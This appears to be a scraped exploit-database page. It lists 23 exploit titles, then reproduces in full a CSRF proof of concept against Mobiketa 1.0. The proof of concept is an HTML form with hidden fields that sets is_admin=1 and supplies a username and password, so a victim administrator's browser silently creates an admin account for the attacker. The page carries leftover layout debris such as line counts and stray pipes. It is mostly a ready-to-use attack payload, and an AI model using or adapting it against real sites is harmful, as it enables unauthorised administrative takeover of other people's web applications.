
23 new exploits Poison Ivy 2.1.x C2 Buffer Overflow (msf) Matrix42 Remote Control Host 3.20.0031 - Unquoted Path Privilege Escalation Dell OpenManage Server Administrator 8.3 - XML External Entity Exploit Mobiketa 1.0 - CSRF Add Admin Exploit miniMySQLAdmin 1.1.3 - CSRF Execute SQL Query phpMyFAQ 2.9.0 - Stored XSS Windows x86 system(_systeminfo_) Shellcode Armadito Antimalware - Backdoor/Bypass Riot Games League of Legends - Insecure File Permissions Privilege Escalation IPFire proxy.cgi RCE IPFire Bash Environment Variable Injection (Shellshock) Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution OS X Kernel - Exploitable NULL Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext Android - /system/bin/sdcard Stack Buffer Overflow OS X Kernel - Exploitable NULL Pointer Dereference in AppleMuxControl.kext OS X Kernel - Exploitable NULL Pointer Dereference in AppleGraphicsDeviceControl OS X Kernel - Exploitable NULL Dereference in IOAccelSharedUserClient2::page_off_resource OS X Kernel - Exploitable NULL Dereference in CoreCaptureResponder Due to Unchecked Return Value OS X Kernel - Exploitable NULL Pointer Dereference in IOAudioEngine OS X Kernel - OOB Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type OS X Kernel - Use-After-Free Due to Bad Locking in IOAcceleratorFamily2 OS X/iOS Kernel - UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient OS X Kernel - Stack Buffer Overflow in GeForce GPU Driver
36 lines
No EOL
1,021 B
HTML
Executable file
36 lines
No EOL
1,021 B
HTML
Executable file
<!--
|
|
# Exploit Title: Mobiketa - CSRF Add Admin Exploit
|
|
# Date: 09/06/2016
|
|
# Exploit Author: Murat YILMAZLAR
|
|
# Vendor Homepage: http://www.ynetinteractive.com/mobiketa/
|
|
# Version: 1.0
|
|
|
|
# Exploit:
|
|
|
|
< -- bug code started -- >
|
|
-->
|
|
|
|
<html>
|
|
<body>
|
|
<form action="[SITE]/[mobiketa_path]/index.php?url=user" method="POST"
|
|
enctype="multipart/form-data">
|
|
<input type="hidden" name="is_admin" value="1" />
|
|
<input type="hidden" name="name" value="murat y" />
|
|
<input type="hidden" name="email"
|
|
value="murrat@protonmail.com" />
|
|
<input type="hidden" name="username" value="murrat" />
|
|
<input type="hidden" name="password" value="123123123" />
|
|
<input type="hidden" name="id" value="15" />
|
|
<input type="hidden" name="update" value=" " />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
<!--
|
|
< -- end of the bug code -- >
|
|
|
|
#########################
|
|
|
|
[+] Contact: http://twitter.com/muratyilmazlarr
|
|
--> |